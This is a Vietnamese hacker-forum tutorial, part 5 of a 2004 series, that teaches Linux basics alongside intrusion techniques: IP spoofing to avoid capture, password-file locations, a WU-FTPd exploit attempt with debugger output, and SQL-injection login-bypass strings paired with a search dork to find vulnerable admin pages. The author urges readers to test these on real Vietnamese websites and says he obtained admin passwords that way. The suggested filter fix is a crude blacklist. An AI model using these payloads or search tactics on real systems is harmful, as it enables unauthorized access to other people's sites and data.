Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 5 - 22/12/2004 9h:57

(Trích quan tri mang)

31 . ) Gói tin TCP/IP là ǵ?

TCP/IP viết tắt cho Transmission Control Protocol and Internet Protocol, một Gói tin TCP/IP là một khối dữ liệu đă được nén, sau đó kèm thêm một header và gửi đến một máy tính khác. Đây là cách thức truyền tin của internet, bằng cách gửi các gói tin. Phần header trong một gói tin chứa địa chỉ IP của người gửi gói tin. Bạn có thể viết lại một gói tin và làm cho nó trong giống như đến từ một người khác!! Bạn có thể dùng cách này để t́m cách truy nhập vào rất nhiều hệ thống mà không bị bắt. Bạn sẽ phải chạy trên Linux hoặc có một chương tŕnh cho phép bạn làm điều này.


32 . ) Linux là gi`:

_Nói theo nghĩa gốc, Linux là nhân ( kernel ) của HĐH. Nhân là 1 phần mềm đảm trách chức vụ liên lạc giữa các chương tŕnh ứng dụng máy tính và phần cứng. Cung cấp các chứng năng như: quản lư file, quản lư bộ nhớ ảo, các thiết bị nhập xuất nhưng ổ cứng, màn h́nh, bàn phím, .... Nhưng Nhân Linux chưa phải là 1 HĐH, v́ thế nên Nhân Linux cần phải liên kết với những chương tŕnh ứng dụng được viết bởi tổ chức GNU tạo lên 1 HĐH hoàn chỉnh: HĐH Linux. Đây cũng là lư do tại sao chúng ta thấy GNU/Linux khi được nhắc đến Linux.
Tiếp theo, 1 công ty hay 1 tổ chức đứng ra đóng gói các sản phẩm này ( Nhân và Chương tŕnh ứng dụng ) sau đó sửa chữa một số cấu h́nh để mang đặc trưng của công ty/ tổ chức ḿnh và làm thêm phần cài đặt ( Installation Process ) cho bộ Linux đó, chúng ta có : Distribution. Các Distribution khác nhau ở số lượng và loại Software được đóng gói cũng như quá tŕnh cài đặt, và các phiên bản của Nhân. 1 số Distribution lớn hiện nay của Linux là : Debian, Redhat, Mandrake, SlackWare, Suse .

33 . ) Các lệnh căn bản cần biết khi sử dụng hoặc xâm nhập vào hệ thống Linux :

_ Lệnh `` man`` : Khi bạn muốn biết cách sử dụng lệnh nào th́ có thể dùng tới lệnh nay :
Cấu trúc lệnh : $ man .
Ví dụ : $ man man
_ Lệnh `` uname ``: cho ta biết các thông tin cơ bản về hệ thống
Ví dụ : $uname -a ; nó sẽ đưa ra thông tin sau :

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ Lệnh id : xem uid/gid hiện tại ( xem nhóm và tên hiện tại )

_ Lệnh w : xem các user đang login và action của họ trên hệ thống .
Ví Dụ : $w nó sẽ đưa ra thông tin sau :

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ Lệnh ps: xem thông tin các process trên hệ thống
Ví dụ : $ps axuw
_ Lệnh cd : bạn muốn di chuyển đến thư mục nào . phải nhờ đến lệnh này .
Ví du : $ cd /usr/bin ---- > nó sẽ đưa bạn đến thư mục bin
_ Lệnh mkdir : tạo 1 thư mục .
Ví dụ : $ mkdir /home/convit --- > nó sẽ tạo 1 thư mục convit trong /home
_ Lệnh rmdir : gỡ bỏ thư mục
Ví dụ : $ rmdir /home/conga ---- > nó sẽ gỡ bỏ thư mục conga trong /home .
_ Lệnh ls: liệt kê nội dung thư mục
Ví dụ : $ls -laR /
_ Lệnh printf: in dữ liệu có định dạng, giống như sử dựng printf() của C++ .
Ví dụ : $printf %s ``\x41\x41\x41\x41``
_ Lệnh pwd: đưa ra thư mục hiện hành
Ví dụ : $pwd ------ > nó sẽ cho ta biết vị trí hiện thời của ta ở đâu : /home/level1
_ Các lệnh : cp, mv, rm có nghĩa là : copy, move, delete file
Ví dụ với lệnh rm (del) : $rm -rf /var/tmp/blah ----- > nó sẽ del file blah .
Làm tương tự đối với các lệnh cp , mv .
_ Lệnh find : t́m kiếm file, thư mục
Ví dụ : $find / -user level2
_ Lệnh grep: công cụ t́m kiếm, cách sử dụng đơn giản nhất : grep ``something``
Vidu : $ps axuw | grep ``level1``
_ Lệnh Strings: in ra tất cả các kư tự in được trong 1 file. Dùng nó để t́m các khai báo hành chuỗi trong chương tŕnh, hay các gọi hàm hệ thống, có khi t́m thấy cả password nữa
VD: $strings /usr/bin/level1
_ Lệnh strace: (linux) trace các gọi hàm hệ thống và signal, cực kỳ hữu ích để theo dơi flow của chương tŕnh, cách nhanh nhất để xác định chương tŕnh bị lỗi ở đoạn nào. Trên các hệ thống unix khác, tool tương đương là truss, ktrace .
Ví dụ : $strace /usr/bin/level1
_ Lệnh`` cat, more ``: in nội dung file ra màn h́nh

$cat /etc/passwd | more -- > nó sẽ đưa ra nội dung file passwd một cách nhanh nhất .
$more /etc/passwd ---- > Nó sẽ đưa ra nội dung file passwd một cách từ từ .

_ Lệnh hexdump : in ra các giá trị tương ứng theo ascii, hex, octal, decimal của dữ liệu nhập vào .
Ví dụ : $echo AAAA | hexdump
_ Lệnh : cc, gcc, make, gdb: các công cụ biên dịch và debug .
Ví dụ : $gcc -o -g bof bof.c
Ví dụ : $make bof
Ví dụ : $gdb level1
(gdb) break main
(gdb) run
_ Lệnh perl: một ngôn ngữ
Ví dụ : $perl -e `print ``A``x1024` | ./bufferoverflow ( Lỗi tràn bộ đệm khi ta đánh vào 1024 kí tự )
_ Lệnh ``bash`` : đă đến lúc tự động hoá các tác vụ của bạn bằng shell script, cực mạnh và linh hoạt .
Bạn muốn t́m hiểu về bash , xem nó như thế nào :
$man bash
_ Lệnh ls : Xem nội dung thư mục ( Liệt kê file trong thư mục ) .
Ví Dụ : $ ls /home ---- > sẽ hiện toàn bộ file trong thư mục Home
$ ls -a ----- > hiện toàn bộ file , bao gồm cả file ẩn
$ ls -l ----- > đưa ra thông tin về các file
_ Lệnh ghi dữ liệu đầu ra vào 1 file :
Vídụ : $ ls /urs/bin > ~/convoi ------ > ghi dữ liệu hiển thị thông tin của thư mục bin vào 1 file convoi .

34 . ) Những hiểu biết cơ bản xung quanh Linux :

a . ) Một vài thư mục quan trọng trên server :

_ /home : nơi lưu giữ các file người sử dụng ( VD : người đăng nhập hệ thống có tên là convit th́ sẽ có 1 thư mục là /home/convit )
_ /bin : Nơi xử lư các lệnh Unix cơ bản cần thiết như ls chẳng hạn .
_ /usr/bin : Nơi xử lư các lệnh dặc biệt khác , các lệnh dùng bởi người sử dụng đặc biệt và dùng quản trị hệ thống .
_ /bot : Nơi mà kernel và các file khác được dùng khi khởi động .
_ /ect : Các file hoạt động phụ mạng , NFS (Network File System ) Thư tín ( Đây là nơi trọng yếu mà chúng ta cần khai thác nhiều nhất )
_ /var : Các file quản trị
_ /usr/lib : Các thư viện chuẩn như libc.a
_ /usr/src : Vị trí nguồn của các chương tŕnh .

b . ) Vị trí file chứa passwd của một số phiên bản khác nhau :

CODE
AIX 3 /etc/security/passwd !/tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Ren /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *


35 . ) Khai thác lỗi của Linux qua lỗ hổng bảo mật của WU-FTP server :

_ WU-FTP Server (được phát triển bởi đại Học Washington ) là một phần mềm Server phục vụ FTP được dùng khá phổ biến trên các hệ thống Unix & Linux ( tất cả các nhà phân phối: Redhat, Caldera, Slackware, Suse, Mandrake....) và cả Windows.... , các hacker có thể thực thi các câu lệnh của ḿnh từ xa thông qua file globbing bằng cách ghi đè lên file có trên hệ thống .
_ Tuy nhiên , việc khai thác lỗi này không phảI là dễ v́ nó phải hội đủ những điều kiện sau :
+ Phải có account trên server .
+ Phải đặt được Shellcode vào trong bộ nhớ Process của Server .
+ Phải gửi một lệnh FTP đặc biệt chứa đựng một globbing mẫu đặc biệt mà không bị server phát hiện có lỗi .
+ Hacker sẽ ghi đè lên một Function, Code tới một Shellcode, có thể nó sẽ được thực thi bới chính Server FTP .
_ Ta hăy phân tích VD sau về việc ghi đè lên file của server FTP :

CODE
ftp > open localhost <== lệnh mở trang bị lỗi .
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready <== xâm nhập thành công FTP server .
Name (localhost:root): anonymous <== Nhập tên chỗ này
331 Guest login ok, send your complete e-mail address as password.
Password:………..<== nhập mật khẩu ở đây
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files. <== sử dụng biến nhị phân để chuyển đổi file .
ftp > ls ~{ <== lệnh liệt kê thư mục hiện hành .
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
1405 ? S 0:00 ftpd: accepting connections on port 21 ç chấp nhận kết nốI ở cổng 21 .
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd:
sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== khai thác lỗi Wu.ftpd .
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c


Việc khai thác qua lỗi này đến nay tôi test vẫn chưa thành công ( chẳng biết làm sai chỗ nào ) . Vậy bạn nào làm được hăy post lên cho anh em biết nhé .
Lỗi Linux hiện nay rất ít ( đặc biệt là đối với Redhat ), các bạn hăy chờ đợi nếu có lỗi ǵ mới th́ bên “LỗI bảo mật” sẽ cập nhật ngay . Khai thác chúng như thế nào th́ hỏi Mod quản lư bên đó , đặc biệt là bạn Leonhart , cậu ta siêng trả lời các bạn lắm .

( Dựa theo bài viết của huynh Binhnx2000 )

36 . ) T́m hiểu về SQL Injection :

_ SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mă SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, thi hành lệnh từ xa, đoạt dữ liệu và lấy root của SQL server. Công cụ dùng để tấn công là một tŕnh duyệt web bất ḱ, chẳng hạn như Internet Explorer, Netscape, Lynx, ...
_ Bạn có thể kiếm được trang Web bị lỗi bằng cách dùng các công cụ t́m kiếm để kiếm các trang cho phép submit dữ liệu . Một số trang Web chuyển tham số qua các khu vực ẩn nên bạn phảI viewsource mớI thấy được . VD ta xác định được trang này sử dụng Submit dữ liệu nhờ nh́n vào mă mà ta đă viewsource :

CODE
<input type=hidden name=A value=C >

_ Kiểm tra thử xem trang Web có bị lỗi này hay không bằng cách nhập vào login và pass lân lượt như sau :

- Login: hi` or 1=1--
- Pass: hi` or 1=1--

Nếu không được bạn thử tiếp với các login và pass sau :

CODE
` or 1=1--
`` or 1=1--
or 1=1--
` or `a`=`a
`` or ``a``=``a
`) or (`a`=`a

Nếu thành công, bạn có thể login vào mà không cần phải biết username và password .
Lỗi này có dính dáng đến Query nên nếu bạn nào đă từng học qua cơ sở dữ liệu có thể khai thác dễ dàng chỉ bằng cách đánh các lệnh Query trên tŕnh duyệt của các bạn . Nếu các bạn muốn t́m hiểu kỹ càng hơn về lỗi này có thể t́m các bài viết của nhóm vicky để t́m hiểu thêm .

37 . ) Một VD về hack Web thông qua lỗi admentor ( Một dạng của lỗi SQL Injection ) :

_ Trước tiên bạn vào google.com t́m trang Web admentor bằng từ khoá “allinurl : admentor” .
_ Thông thường bạn sẽ có kết quả sau :

http://www.someserver.com/admentor /admin/admin.asp

_ Bạn thử nhập “ ` or ``=` ” vào login và password :

CODE
Login : ` or ``=`
Password : ` or ``=`


_ Nếu thành công bạn sẽ xâm nhập vào Web bị lỗi với vai tṛ là admin .
_ Ta hăy t́m hiểu về cách fix lỗi này nhé :
+ Lọc các kư tự đặc biệt như “ ` `` ~ \ ” bằng cách chêm vào javascrip đoạn mă sau :

CODE
function RemoveBad(strTemp)
{
strTemp = strTemp.replace(/\<|\ > |\``|\`|\%|\;|\(|\)|\&|\+|
\-/g,````);
return strTemp;
}

+ Và gọi nó từ bên trong của asp script :

CODE
var login = var TempStr = RemoveBad
(Request.QueryString(``login``));
var password = var TempStr = RemoveBad
(Request.QueryString(``password``));


- Vậy là ta đă fix xong lỗi . 

- Các bạn có thể áp dụng cách hack này cho các trang Web khác có submit dữ liệu , các bạn hăy test thử xem đi , các trang Web ở Việt Nam ḿnh bị nhiều lắm , tôi đă kiếm được kha khá pass admin bằng cách thử này rồi ( nhưng cũng đă báo để họ fix lại ) . 
-  Có nhiều trang khi login không phải bằng “ ` or ``=’ ” mà bằng các nick name có thật đă đăng kư trên trang Web đó , ta vào link “thành viên” kiếm nick của một admin để test thử nhé .
Hack vui vẻ .

 



Ở phần 6 tôi sẽ đề cập đến kiểu tấn công từ chối dịch vụ ( DoS attack ) , một kiểu tấn công lợi hại đă làm cho trang Web hùng mạnh như HVA của chúng ta bị tắt nghẽn chỉ trong thờI gian ngắn các admin bận đi uống cafe hết mà không ai trông coi . Kèm theo đó là các phương pháp tấn công DoS đă và đang được sử dụng .

GOOKLUCK!!!!!!!!!!!!!!!!!!!!

( Hết phần 5 ) 

Tác giả: Anhdenday - HVAonline